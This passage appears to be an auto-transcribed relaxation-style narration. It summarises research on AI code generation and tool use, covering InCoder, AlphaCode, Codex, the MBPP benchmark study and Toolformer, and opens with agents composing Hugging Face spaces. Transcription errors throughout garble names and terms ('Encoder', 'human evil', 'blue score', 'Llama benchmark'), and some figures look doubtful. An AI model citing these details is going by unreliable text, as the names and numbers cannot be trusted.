the Sphinx, Abu Simbel, the Mask of Tutankhamun, Karnak, and the Colossi of Memnon, while the Japan collection featured Tokyo Tower, Himeji Castle, Kinkakuji, Osaka Castle, the Great Buddha of Kamakura, and the Itsukushima Torii, all using the same two spaces with only the props changing. This exemplifies the building block economy in its purest form, where the marginal cost of creating a new multimedia application approaches the simple cost of describing what you want, like having a genie that can materialize your wishes as long as you can articulate them clearly. 3 profound shifts emerge from this new paradigm. First, models become truly composable, allowing state-of-the-art splat models and image models from completely different organizations to chain together with zero integration code, transforming Hugging Face's Open Weights catalog into a vast library of callable multimedia primitives. Second, agents naturally gravitate toward what's documented and easily reachable. So the agents.nd specification makes spaces trivially accessible, creating the same preference dynamic that Hashimoto identified with open source libraries, where convenience drives adoption more than raw capability. Third, the integration barrier that once made turn a prompt into a rotating 3D monument feel like a substantial project has largely evaporated, reducing what used to be weeks of work into a single step in a larger pipeline, like turning a complex recipe into a simple ingredient. The building blocks are already there, waiting on the hub, and the agents already possess the knowledge to glue them together. You can point any coding agent at these agents.md endpoints, set your HF token, and watch as it assembles multimedia applications that would have required teams of specialists just a few years ago, all through the simple act of connecting documented, reusable pieces.
Can you picture that remarkable scene? A human asking for a 3D gallery of Parisian monuments, never touching the specialized tools themselves, yet watching an agent orchestrate multiple AI systems to create something extraordinary. This is Mitchell Hashimoto's building block economy in action, where excellence comes not from building everything from scratch, but from knowing how to connect the right pieces. Let this possibility rest gently in your mind as we journey backward in time to understand how these capabilities first emerged.
Back in 2022, researchers at Facebook AI Research and several universities introduced Encoder, a large language model designed to tackle a fundamental limitation of existing code generation systems. Like a carpenter who can't easily insert new planks into the middle of an existing structure, most neural code models could only generate code from left to right, making them poorly suited for the editing tasks that comprise much of real programming work. Encoder addressed this by training a 6.7 billion parameter transformer model using a novel causal masking objective that enabled both traditional code synthesis and arbitrary code infilling. The core innovation lay in how the training data was prepared, resembling a jigsaw puzzle where pieces are temporarily removed and rearranged. During training, the system randomly selected spans of code from documents, replaced them with special mask tokens, and moved the original content to the end of the file. This allowed the model to learn associations between masked locations and their replacements while maintaining the autoregressive structure that enables standard left-to-right generation. The approach sampled mask spans from a Poisson distribution with mean 1, creating typically 1 to 3 masked regions per document, though occasionally up to 256 spans. The training corpus was substantial, encompassing 159 gigabytes of permissively licensed code from GitHub and GitLab across 28 programming languages, with 52 gigabytes specifically in Python. Like a library that carefully curates its collection, the researchers decontaminated their training set by removing any datasets used in their evaluation experiments. Additionally,
They included 57 gigabytes of Stack Overflow content, which proved crucial for performance on language-guided synthesis tasks, as the mixture of natural language and code improved the model's ability to understand programming problems described in plain English. During inference, the model operated like a versatile tool that could switch between two modes seamlessly. For traditional code synthesis, it generated tokens left to right without any special tokens. For infilling tasks, users inserted mask tokens at desired locations, and the model generated appropriate code to fill those gaps by conditioning on both left and right context. The researchers evaluated 3 inference approaches: left-to-right single completion, left-to-right with re-ranking using bidirectional scoring, and their causal masking approach that directly generated infills using surrounding context.
The team created comprehensive benchmarks from existing datasets, transforming the human eval function synthesis dataset into infilling challenges. Like a sculptor removing material to reveal the form within, they systematically masked individual lines and multiple contiguous lines from canonical function implementations, creating tasks where models had to reconstruct the missing code. Success was measured both by functional correctness, where completed functions had to pass all input-output test cases, and exact match accuracy against the original implementations. These metrics provided robust evaluation, since correct code could be written in multiple ways. Results on the human eval-based infilling tasks demonstrated substantial improvements from bidirectional context, with causal masking achieving 76.7% pass rate on single-line infilling, compared to 60.6% for left-to-right generation alone. The advantage grew more pronounced as more right-side context became available, rising from modest gains when infilling near function ends to significant improvements when reconstructing early function lines. Multi-line infilling showed similar patterns, with causal masking reaching 70.8% pass rate versus 54.1% for the left-to-right baseline, confirming that access to subsequent code substantially aided reconstruction of missing logic. Documentation generation represented another compelling application where conditioning on function implementations allowed more accurate docstring creation. Like a translator working with a complete manuscript rather than fragments, the model could generate descriptions that reflected actual functionality rather than just function signatures. On the Codex docstring generation benchmark, zero-shot causal masking achieved a blue score of 18.73, approaching the performance of supervised models fine-tuned on 250,000 examples, while substantially outperforming left-to-right approaches that only saw function signatures. Type prediction tasks revealed particularly striking benefits from bidirectional context, since function return types often depend heavily on implementation details rather than signatures alone. On a dataset constructed from Codex glue, causal masked infilling achieved 59.2% accuracy compared to just 30.8% for left-to-right generation, representing nearly a doubling of performance. Similar improvements appeared on the typewriter OSS dataset, where the zero-shot model actually outperformed supervised approaches specifically trained for type prediction, achieving 59.2% F1 score versus 48.3% for the specialized typewriter system. Variable naming experiments demonstrated how surrounding code context enables more semantically appropriate identifier choices. Like a poet selecting words that harmonize with the entire verse, the model could choose variable names that fit both local usage patterns and broader program structure. Causal masked infilling achieved 40.4% accuracy on variable name prediction compared to 28.7% for left-to-right generation, with the improvement coming from the model's ability to see how variables were used throughout their scope rather than just at their first appearance. Ablation studies revealed that the causal masking objective didn't compromise traditional code generation capabilities, maintaining competitive performance on standard left-to-right synthesis benchmarks.
A 1.3 billion parameter model trained with causal masking actually slightly outperformed an equivalent model trained with standard language modeling on human evil, achieving 15.2% versus 13.5% pass-at-1 scores. The researchers also discovered that including Stack Overflow content in training provided substantial benefits, improving performance by roughly 4 to 5 percentage points on synthesis benchmarks compared to training on code files alone. Scale effects followed expected patterns, with the full 6.7 billion parameter model significantly outperforming smaller variants across all tasks. Like a symphony that requires sufficient instrumental range to achieve its full expression, the model's capabilities scaled smoothly with parameter count. Training on multiple programming languages slightly reduced Python-specific performance compared to Python-only training. But the inclusion of natural language content from Stack Overflow more than compensated for this trade-off, highlighting the importance of diverse training corpora for code generation systems. The work established Encoder as the first large-scale generative model capable of arbitrary code infilling, addressing a significant gap between how programmers actually work and what existing tools could support. Unlike previous approaches that were limited to either pure generation or narrow editing tasks, this unified model could handle the spectrum from complete program synthesis to precise local modifications. The causal masking training paradigm proved both effective and practical, achieving strong performance across diverse code manipulation tasks while maintaining the simplicity and efficiency of autoregressive generation.
Someone else is awake right now, listening to this very moment with you. If that's you, leave a word below, so the rest of us know we're not alone at this hour.
Feel the elegance of that breakthrough, how Encoder learned to work like a carpenter, who can insert new planks anywhere in an existing structure, not just add them to the end. This ability to fill in missing pieces, to edit and refine, brought us much closer to how humans actually work with code. You don't need to remember the technical details, just hold on to the larger meaning. Now let's continue our journey through these foundational discoveries, visiting the breakthrough that taught AI systems to compete with human programmers.
Back in 2022, DeepMind introduced AlphaCode, a system that represented the first time an AI had achieved genuinely competitive performance on programming challenges that required deep algorithmic reasoning, rather than just translating simple instructions into code. Like a chess grandmaster studying thousands of games before facing a tournament opponent, AlphaCode was trained on massive amounts of code from GitHub, and then specialized on competitive programming problems, achieving an average ranking in the top 54.3% among more than 5,000 participants in simulated programming contests on the popular Codeforces platform. The challenge AlphaCode tackled was fundamentally different from earlier code generation work, which focused on relatively simple programming tasks with short solutions. Competitive programming problems are like intricate puzzles that demand understanding complex natural language descriptions, reasoning about previously unseen scenarios, mastering diverse algorithms and data structures, and implementing solutions that can span hundreds of lines of precisely crafted code, all evaluated against hidden test cases that check for correctness on edge cases and execution efficiency.
The researchers recognized that existing datasets for evaluating code generation suffered from a critical flaw, much like a leaky bucket that appears full but cannot hold water when tested.
Previous benchmarks had false positive rates of 30 to 60%, meaning that many programs marked as correct were actually flawed, making it impossible to measure genuine progress in the field. To address this evaluation crisis, the team created code contests, a new dataset combining problems from Codeforces, Description to Code, and CodeNet, with a strict temporal split, ensuring all training data predated evaluation problems. Like an archaeologist carefully stratifying excavation layers, they maintained chronological separation,
where training data appeared online before July 14, 2021, validation problems between July 15 and September 20, 2021, and test problems after September 21, 2021. The researchers dramatically improved test coverage by generating additional test cases through systematic mutation of existing inputs, applying techniques like bit flips to binary data, incrementing or decrementing integers, and swapping characters and strings. This process, verified by running 30 correct solutions on each mutated input, reduced the false positive rate from 62% to just 4%, creating a reliable benchmark for measuring actual progress. Alpha Code's architecture employed an encoder-decoder transformer design, treating competitive programming as a sequence-to-sequence translation task from natural language problem descriptions to programming language solutions. Like a translator who carefully reads an entire document before writing, the bidirectional encoder could attend to all parts of the problem description simultaneously, while the autoregressive decoder generated code one token at a time.
The system used an asymmetric design with 1536 tokens for the encoder and 768 tokens for the decoder, reflecting the observation that problem descriptions average twice the length of their corresponding solutions. The researchers discovered that using a shallow encoder with a deep decoder significantly improved training efficiency without sacrificing problem-solving performance, optimizing the architecture for their specific task demands. Training proceeded in 2 stages, beginning with pre-training on 715.1 gigabytes of code from GitHub repositories across 12 programming languages, including C++, Python, Java, and others. Like a student learning fundamental principles before tackling specialized subjects, this phase helped the model learn good representations of code structure and developed fluency in generating syntactically correct programs. The fine-tuning stage adapted the pre-trained models specifically to competitive programming using the code contest dataset, employing GOLD, gradual unfolding of label distributions, with tempering as the training objective. This specialization was crucial, as models that performed well on simple programming tasks from pre-training could solve very few competitive programming problems without this domain-specific adaptation. AlphaCode's inference process resembled a factory assembly line with multiple quality control stations, generating massive numbers of candidate solutions for each problem, and then systematically filtering them down to a small set of submissions. For each problem, the system would create up to millions of samples, filter them using example tests provided in problem descriptions, and then cluster the surviving candidates based on program behavior to select the most promising submissions. The evaluation methodology used a metric called N at K, representing the percentage of problems solved using N submissions selected from K-generated samples per problem. Like a careful experimenter controlling variables, the researchers fixed these parameters to enable fair comparisons, typically using 10 at K to model the reality of programming competitions where multiple incorrect submissions incur penalties. On their code contests benchmark, AlphaCode's best model achieved a 34.2% solve rate using at most 10 submissions per problem, compared to previously reported solve rates of just 1 to 5% on existing datasets. This dramatic improvement reflected both the system's capabilities and the more rigorous evaluation methodology that eliminated the false positives plaguing earlier benchmarks. The most compelling validation came from simulated competitions on actual Codeforces contests, where AlphaCode competed against real human programmers on problems it had never seen during training. Like an athlete proving their worth in actual competition rather than practice sessions, the system achieved rankings that placed it among the top 54.3% of participants across 10 contests with over 5,000 competitors each. Based on these competition results, the researchers estimated AlphaCode achieved a Codeforces rating of 1,238, placing it in the top 28% of users who had participated in contests within the previous 6 months. This represented the first time a computer system had achieved such competitive performance in programming contests, demonstrating capabilities that extended well beyond simple code completion or template filling. Analysis of AlphaCode solutions revealed that the system did not simply memorize and recombine code snippets from its training data, but instead relied heavily on understanding natural language problem descriptions to create genuinely novel solutions. Like a composer creating new melodies rather than plagiarizing existing songs, AlphaCode demonstrated the ability to synthesize original approaches to previously unseen problems. The research revealed several key insights about scaling in code generation, showing that performance improved significantly with larger model sizes, from 300 million to 41 billion parameters, and with increased numbers of generated samples. However, the relationship between validation loss during training and actual problem-solving capability proved surprisingly weak, highlighting the unique challenges of evaluating code generation systems. Multi-query attention played a crucial role in making large-scale sampling computationally feasible, sharing key and value heads across attention blocks, while maintaining separate query heads. This architectural choice, like a memory management system that reduces redundancy while preserving essential information, dramatically reduced memory usage and cache update costs during the sampling-intensive inference process. The system's limitations became apparent through detailed analysis, showing particular difficulty with problems requiring advanced mathematical reasoning, complex data structure manipulation, or highly optimized algorithmic solutions. These challenges highlighted areas where future research might focus to achieve even stronger performance on the most difficult competitive programming problems. AlphaCode's success in 2022 demonstrated that large language models could tackle substantially more complex programming challenges than previously thought possible, moving beyond simple code completion to genuine algorithmic problem solving. The work established competitive programming as a meaningful benchmark for AI systems, providing a rigorous testbed for evaluating code generation capabilities that require deep reasoning and creativity. The release of the code contest dataset and the rigorous evaluation methodology established new standards for the field, providing researchers with better tools to measure genuine progress in code generation rather than being misled by inflated performance on inadequate benchmarks. This contribution proved as valuable as the system itself, enabling more reliable research in an area where measurement had been notoriously difficult. Rest with the significance of that achievement for a moment. AlphaCode didn't just translate simple instructions. It reasoned through complex puzzles, like a grandmaster studying chess positions. This was the first time an AI system could truly compete with humans on problems requiring deep algorithmic thinking. Let that milestone settle gently as we explore another foundational breakthrough: the system that learned to bridge the gap between human language and working code. Back in 2021, researchers at OpenAI introduced Codex, a specialized version of GPT that was fine-tuned specifically on publicly available code from GitHub to generate Python programs from natural language descriptions. Like a translator who has immersed themselves in the literature of two languages, Codex learned to bridge the gap between human descriptions and executable code by training on 159 gigabytes of Python files collected from 54 million public repositories. The researchers evaluated Codex using a novel approach that measured functional correctness rather than just textual similarity, creating their own benchmark called Human Eval with 164 handwritten programming problems
each equipped with unit tests to verify whether generated code actually worked. Like a driving test that measures actual road performance rather than knowledge of traffic rules, this evaluation framework checked whether the code could successfully execute and produce correct outputs, not just whether it looked similar to reference solutions.
The results revealed a striking hierarchy of capabilities, with the largest 12 billion parameter Codex model solving 28.8% of problems on the first try, while standard GPT-3 solved essentially none, and GPT-J managed only 11.4%. Like a marksman whose accuracy improves dramatically with multiple shots, Codex's performance soared to 70.2% when allowed to generate 100 attempts per problem, suggesting that correct solutions often emerged through repeated sampling rather than perfect aim on the first try. To create their training dataset, the team collected Python files from GitHub in May 2020, carefully filtering out auto-generated code, files with extremely long lines, and those with few alphanumeric characters, ultimately assembling 159 gigabytes of clean Python code. Like a librarian meticulously curating a collection by removing damaged books and duplicate copies,
this pre-processing ensured that Codex learned from high-quality, human-written code rather than machine-generated noise or corrupted files.
the researchers discovered that model performance followed predictable scaling laws, with larger models consistently outperforming smaller ones according to a power law relationship that held even after code-specific fine-tuning. Like a telescope that reveals fainter stars as its aperture increases, each doubling of model parameters unveiled new coding capabilities, with test loss decreasing as the negative 0.13 power of the number of parameters. Temperature settings proved crucial for optimization, with higher temperatures beneficial when generating many samples and lower temperatures better for single attempts, creating a delicate balance between diversity and precision. Like a chef adjusting flame intensity depending on whether they need a gentle simmer or rapid boil, the researchers found that pass at 1 performance peaked at temperature 0.2, while pass at 100 reached optimal results at temperature 0.8. When multiple samples were generated, but only one could be evaluated, selecting the solution with the highest mean log probability significantly outperformed random selection, though it fell short of having access to an oracle that knew the correct answer. Like a wine judge who must choose the best bottle from a flight without tasting them all, this heuristic provided a practical way to identify promising solutions when exhaustive testing wasn't feasible, achieving 44.5% success, compared to the theoretical maximum of 77.5%. Comparisons with contemporary models revealed Codex's substantial advantages, with GPT-J requiring roughly 20 times more parameters to achieve equivalent performance, while the leading commercial code completion tool, Tab9, performed similarly to the smallest Codex model. Like a professional athlete competing against weekend enthusiasts, Codex demonstrated that specialized training on code yielded dramatic improvements over general-purpose language models that had encountered code only incidentally. The team also created Codex S through supervised fine-tuning on carefully curated programming problems from competitive programming websites and open-source projects with continuous integration, which improved performance by an average of 6.5 percentage points on single samples. Like a medical student who supplements textbook learning with hands-on clinical rotations, this additional training on verified, correctly implemented functions helped the model better understand the specific task of synthesizing code from docstrings. To collect training problems from real-world projects, the researchers used Python's profiling capabilities to trace function calls during integration tests, capturing inputs and outputs that could be converted into unit tests for training examples. Like a detective following footprints through a crime scene, this tracing methodology automatically extracted 40,000 examples of function behavior from actual software projects running their test suites
in the sandboxed environment.
The researchers also developed Codex D, a model trained to generate docstrings from code rather than the reverse, achieving 20.3% accuracy on single attempts and 46.5% when allowed 10 tries, as evaluated through manual grading of generated documentation. Like a court stenographer working backwards to create summaries from transcripts, this model learned to describe the intent and functionality of code, though it sometimes invented problems unrelated to the actual function or copied code directly into the documentation. Safety considerations led the team to develop a sophisticated sandbox environment using gvisor container runtime and eBPF-based firewall rules to safely execute untrusted code without risking the host system or network. Like a bank vault with multiple layers of protection, this infrastructure prevented potentially malicious generated programs from modifying files, accessing sensitive resources, or communicating with external systems, while still allowing proper evaluation of code correctness. The study revealed significant limitations in Codex's capabilities, particularly with longer, more complex specifications, where performance degraded exponentially as the number of chained operations increased. Like a telephone game where messages become increasingly garbled with each relay, Codex struggled to maintain accuracy when docstrings describe sequences of operations, with pass rates dropping by factors of 2 or 3 with each additional component in synthetic tests. Analysis of failure modes showed that Codex had particular difficulty with binding operations to variables when multiple variables and operations appeared in docstrings, often failing to apply the correct transformations to the intended targets. Like a busy waiter who mixes up orders when serving multiple tables simultaneously, the model sometimes confused which operations should be applied to which variables, especially in more complex scenarios involving several mathematical or logical steps. The researchers found that BLEU scores, commonly used to evaluate code generation, correlated poorly with functional correctness, with significant overlap between the score distributions of correct and incorrect solutions. Like judging a car's reliability by its paint job rather than engine performance, optimizing for textual similarity to reference solutions didn't necessarily produce code that actually worked, reinforcing the importance of their functional correctness evaluation approach. Despite requiring exposure to hundreds of millions of lines of code during training, Codex remained less sample efficient than human learners, with strong computer science students expected to solve a larger fraction of problems than the 12 billion parameter model. Like a student who must read entire libraries to understand concepts that others grasped from a single textbook, Codex's learning process was remarkably inefficient compared to human cognitive abilities in programming. The broader impact analysis highlighted both the potential benefits and risks of deploying powerful code generation systems, including possibilities for helping onboard new developers and enabling non-programmers to create implementations, but also concerns about misuse and safety. Like a powerful medicine that can heal or harm depending on its application, Codex represented a tool whose ultimate impact would depend heavily on how it was implemented, monitored, and controlled in real-world deployment scenarios. Can you feel the shift that Codex represented? Like a translator who had finally learned to move fluidly between human intentions and executable programs. The breakthrough wasn't just in generating code, but in creating systems that could be evaluated on whether they actually worked, not just whether they looked right. Hold on to that distinction as we explore how researchers first discovered that even general language models, without special code training, could begin to write programs. Back in 2021, a research team from Google explored whether large language models could learn to write computer programs, like asking a skilled craftsman to build furniture using only written instructions instead of blueprints.
They tested a collection of transformer models ranging from 244 million to 137 billion parameters on 2 new benchmarks designed to measure Python program synthesis from natural language descriptions, finding that performance scaled log linearly with model size, and that even without specialized code training, their largest models could solve programming problems with surprising competence.
The researchers created 2 distinct datasets to test different aspects of code generation, like preparing 2 different obstacle courses to test an athlete's varied skills. The first dataset, called Mostly Basic Programming Problems or MBPP, contained 974 short Python programming tasks crowdsourced from workers with basic Python knowledge, designed to be solvable by entry-level programmers and featuring problems ranging from simple numeric manipulations to tasks requiring knowledge of integer sequences, with an average solution length of 6.8 lines of code. Their second dataset, MathQA Python, represented a different challenge entirely, like translating poetry from one language to another while preserving its meaning. This dataset contained 23,914 mathematical word problems converted from the existing MathQA benchmark, where the original domain-specific language solutions were rewritten as Python programs, creating synthesis tasks with more complex natural language descriptions, but mostly straight-line code, in contrast to MBPP's emphasis on imperative control flow, like loops and conditionals. The models they tested were dense, left-to-right transformer language models trained on a mixture of web documents, dialogue data, and Wikipedia, encompassing 2.97 billion documents tokenized into 2.81 trillion BPE tokens, like a vast library containing both technical manuals and casual conversations. Notably, while their training data included websites with code and text, such as programming question and answer sites, comprising about 13.8 million documents, they did not specifically include source code files, except where code appeared naturally within web pages. They evaluated synthesis performance under 2 distinct regimes, measuring functional correctness rather than proxy metrics like token accuracy or BLEU scores, similar to judging a recipe by whether it produces edible food rather than how closely it matches cookbook language. For few-shot prompting, they concatenated several example problems into longer prompts, while for fine-tuning experiments on MBPP, they used a remarkably small training set of just 374 examples, fine-tuning with a small learning rate for only 100 steps, yet achieving substantial performance improvements. Their primary results on MBPP revealed that synthesis performance scaled predictably with model size, like climbing a mountain where each step up provides a clearer view of the landscape below. The largest model achieved 59.6% accuracy on few-shot learning, solving problems by generating 80 temperature-sampled solutions per problem and checking whether any passed the provided test cases, with fine-tuning providing roughly a 10 percentage point improvement across most model sizes, demonstrating that even minimal training data could substantially boost performance. The error analysis revealed interesting patterns in model failures, resembling how a student's mistakes evolve as they learn programming fundamentals. For the smallest models, syntax and type errors dominated, but as model size increased, these decreased dramatically, with the largest 137 billion parameter model producing syntactically correct Python code about 80% of the time, and having over 63% of its failures due to incorrect logic rather than basic programming errors. Surprisingly, the models showed minimal sensitivity to the number of test cases included in prompts, like a navigator who can find their destination whether given one landmark or several. Including 3 test assertions versus just 1 resulted in solving only 3 additional problems, suggesting the models weren't primarily using test cases for semantic reasoning, though performance proved highly sensitive to which specific examples were chosen as prompts, with different prompt selections varying from 39% to 60% problem-solving rates. To address concerns about overfitting to test cases, the researchers examined whether solutions generalized beyond the provided assertions, like checking whether a supposedly universal key works on doors other than the one it was designed for. They manually created adversarial test cases for 50 problems and found that approximately 88% of solutions that passed original tests also handled these more challenging cases, indicating genuine problem solving rather than mere test case memorization, though about 12% of solutions failed the harder tests. On the MathQA Python dataset, the models demonstrated even more impressive capabilities, like a translator becoming more fluent when working with familiar subject matter. The largest model achieved 33.4% accuracy in few-shot settings, but fine-tuning dramatically improved performance to 83.8% accuracy, showing that the models could effectively learn to convert complex mathematical word problems into executable Python code when given sufficient examples during training. Perhaps most intriguingly, the researchers explored human-model collaboration, investigating whether programmers could guide the models to better solutions through natural language feedback, like a coach helping an athlete refine their technique through verbal cues. They found that human feedback could reduce error rates by 50%, improving few-shot performance from 30% to 65% over 4 turns of dialogue, suggesting these models could serve as interactive programming assistants rather than one-shot code generators. However, when the team tested whether the models could execute the code they generated, predicting program outputs given specific inputs, the results were disappointing, like discovering that a skilled chef cannot taste their own cooking. Even their largest models generally failed at code execution tasks, whether in few-shot or fine-tuned settings, revealing a significant gap between code generation capabilities and true program understanding, suggesting the models were pattern matching rather than developing deep computational reasoning. The researchers also investigated potential memorization concerns by analyzing overlap between their test problems and the pre-training dataset, like checking whether a student had seen the exact exam questions during study sessions. They found minimal overlap between MBPP solutions and the pre-training corpus, reducing the likelihood that good performance resulted from simple memorization rather than genuine synthesis capabilities, though they acknowledged this analysis had limitations given the vast size of modern training datasets. Their comparison between the original crowdsourced dataset and a hand-curated subset revealed the importance of problem quality, like comparing rough sketches to polished technical drawings. On 100 problems appearing in both versions, model performance increased from 63% on the original dataset to 79% on the edited version, demonstrating how problem clarity and standard function signatures could significantly impact synthesis success rates. This 2021 work established important baselines for large language model program synthesis capabilities, like early aviation experiments that demonstrated flight was possible even if the planes were crude and unreliable. The researchers showed that general-purpose language models without specialized code training could achieve meaningful programming competence through few-shot learning, and that minimal fine-tuning could dramatically improve performance, laying groundwork for the more sophisticated code generation systems that would emerge in subsequent years.
Notice how even these early experiments revealed something profound about the relationship between scale and capability, how larger models could solve programming problems with surprising competence, even without specialized training, like discovering that a craftsman could build furniture from written instructions alone, without ever seeing blueprints. Let this early promise rest gently in your thoughts as we visit the final piece of our journey, the breakthrough that taught language models to reach beyond themselves and use external tools.
Back in 2023, researchers at Meta AI introduced Toolformer, a fascinating approach that allowed language models
to teach themselves how to use external tools without human supervision, like a craftsperson gradually learning which instrument works best for each delicate task. The work addressed a fundamental paradox in large language models. While these systems could handle complex reasoning from just a few examples, they struggled embarrassingly with basic tasks like arithmetic or factual lookup, areas where much simpler specialized tools excelled effortlessly. The tool-former approach was elegantly self-supervised, requiring nothing more than a handful of demonstrations for each API, much like showing a student chef just a few examples of proper knife technique before letting them practice independently. The researchers equipped their model with 5 different tools: a calculator for arithmetic operations, a question-answering system based on Atlas, a Wikipedia search engine using BM25 retrieval, a machine translation system using the 600 million parameter NLLB model, and a calendar API that could return the current date when queried. The training process unfolded in 3 carefully orchestrated steps, resembling a quality control inspector examining products on an assembly line to determine which ones met standards. First, the researchers used GPTJ's in-context learning abilities to sample potential API calls at various positions in text sequences, guided by prompts that demonstrated proper tool usage. They sampled up to K candidate positions, where the probability of starting an API call exceeded a threshold tau s, then generated up to M API calls for each promising position. The crucial filtering step determined whether each API call actually helped the model predict future tokens, operating like a discerning librarian, deciding which books truly belonged in a curated collection. The researchers compared 2 losses: Li+, representing the weighted cross-entropy loss when both the API call and its result were provided as context, and Li-, representing the minimum loss from either making no API call or providing only the call without its result. They retained only API calls where the difference Li- minus Li+ exceeded a filtering threshold tau f, ensuring the tool usage genuinely reduced prediction difficulty. The model fine-tuning phase merged the surviving API calls back into the original text sequences, creating an augmented dataset that contained the exact same content as before, but with strategically placed tool invocations, like a musician's score enhanced with perfectly timed instrumental accompaniments. This design choice was crucial because it meant Toolformer was exposed to identical content during training, while learning exactly when and how to invoke tools based on its own feedback about their utility for predicting subsequent tokens. During inference, the system performed standard text generation until encountering the special arrow token, way, at which point it would pause decoding like a telephone operator connecting a call, execute the appropriate API request, insert both the response and closing API token, then resume generation seamlessly. The researchers used special token sequences including A, C, and dot to represent API call boundaries without modifying the existing language model's vocabulary, ensuring compatibility with the pre-trained GPTJ architecture. The experimental evaluation in 2023 demonstrated substantial improvements across diverse downstream tasks, with Toolformer based on 6.7 billion parameter GPTJ, often outperforming much larger models like 175 billion parameter GPT-3, like a skilled craftsperson with quality tools outproducing a factory with outdated equipment. On the Llama benchmark's factual completion tasks, Toolformer improved performance by 11.7 points on Squad, 5.2 points on Google RE, and 18.6 points on T-Rex compared to baseline GPTJ models, using the question answering tool for 98.1% of examples. Mathematical reasoning tasks revealed even more dramatic improvements, with Toolformer more than doubling performance on ASDiv, SVAMP, and MOBS benchmarks compared to baseline models, functioning like a student who finally discovered they could use a calculator during exams. The model automatically decided to invoke the calculator tool for 97.9% of mathematical problems, leading to substantial gains over both same-sized baselines and the much larger OPT66B and GPT-3 models on these arithmetic reasoning tasks. For question-answering datasets, including web questions, natural questions, and trivia QA, Toolformer relied primarily on Wikipedia search, calling this API for 99.3% of examples and substantially outperforming same-sized baselines, though it still lagged behind GPT-3's superior performance, like a researcher with access to a basic library competing against one with a comprehensive research database. The researchers attributed this gap to their simple BM25 search engine and Toolformer's inability to interact iteratively with search results through query reformulation or browsing multiple results. Multilingual evaluation on MLQA revealed more mixed results, with Toolformer showing improvements when API calls were enabled, but not consistently outperforming vanilla GPT-J, partly because the additional CCNet training sometimes hurt performance due to distribution shift, like a translator who gained new tools but lost familiarity with their original reference materials. The machine translation tool was used for 63.8% to 94.9% of examples depending on language, with Hindi being a notable exception at only 7.3% usage. Temporal reasoning tasks provided insights into the calendar API's effectiveness, with Toolformer achieving significant gains on the researcher's custom dateset, where knowing the current date was essential, using the calendar tool for 54.8% of examples, like a scheduler finally gaining access to an accurate timepiece. However, on TempLlama's more complex temporal facts, the calendar was used for only 0.2% of examples, with improvements instead coming from question answering and Wikipedia search tools, addressing the named entities in those queries. Crucially, the language modeling evaluation confirmed that Toolformer maintained its core abilities without degradation, showing similar perplexities on Wikitext and CCNet validation sets, whether API calls were enabled or disabled during training, like a versatile athlete who added new skills without losing their fundamental conditioning. This preservation of general language modeling capability while gaining tool use abilities represented a key advantage over approaches that might sacrifice broad competency for specialized functionality. The scaling law experiments revealed fascinating emergence patterns across model sizes from 124 million to 6.7 billion parameters, showing that effective tool usage only emerged around 775 million parameters. Like a developing musician who suddenly gains the coordination to play complex instruments after years of practice. Smaller models achieved similar performance with and without tools, while larger models maintained substantial gaps between tool-enabled and tool-disabled performance. The decoding strategy analysis examined the effect of generating API tokens when they ranked among the top K most likely tokens, rather than requiring them to be the single most probable choice, functioning like a decision maker who considers multiple good options rather than rigidly following only the top recommendation. Increasing K from 1 to 10 dramatically increased API usage from 43% to 98.1% on T-Rex, with the model showing interesting calibration properties at K equals 1, where it preferentially made API calls for examples it would struggle with otherwise. The 2023 Toolformer work represented a significant step toward language models that could autonomously decide when and how to use external tools, learning these capabilities through self-supervision rather than extensive human annotation, like an apprentice who develops judgment about tool selection through guided practice rather than rigid instruction. The approach's generality meant it could potentially be applied to any dataset and any set of text-compatible APIs, opening possibilities for much broader tool integration in language models. The filtering mechanism that determined API call utility proved particularly elegant, using the model's own prediction difficulties as a signal for when tool usage was beneficial, operating like a feedback system that automatically identifies when external assistance improves performance. This self-supervised approach avoided the need for human judgments about tool utility while ensuring that only genuinely helpful API calls survived the training process, creating a more efficient and scalable method for teaching tool usage. Looking back at this 2023 research from today's perspective, Toolformer's approach of letting language models teach themselves tool usage through self-supervised learning established important principles that influence subsequent work in AI tool integration, much like a foundational architectural design that inspires later construction projects. The work demonstrated that models could learn not just to use tools, but to develop judgment about when different tools were appropriate for different contexts, moving beyond task-specific tool usage toward more general capability enhancement. The experimental design's emphasis on zero-shot evaluation without task-specific demonstrations made the results particularly compelling, showing that Toolformer could generalize its tool usage training to new scenarios without explicit instruction about which tools to use for which tasks, like a versatile technician who can diagnose problems and select appropriate instruments without detailed manuals. This generalization capability suggested that the approach captured something fundamental about the relationship between language understanding and tool selection, rather than merely memorizing specific patterns.
And here we are, at the end of our journey through this transformation. We've traveled from the constraints that shape what's possible, through the real engineering teams living this change, back through the research breakthroughs that made it all possible. The Codex moment isn't just about AI writing code. It's about a fundamental shift in what it means to be a senior engineer, where knowing what to ask for becomes more valuable than knowing how to write it yourself. You don't need to figure out what this means for you tonight. Simply rest with the understanding that something profound is shifting, and you're not alone in feeling both excited and uncertain about where it leads.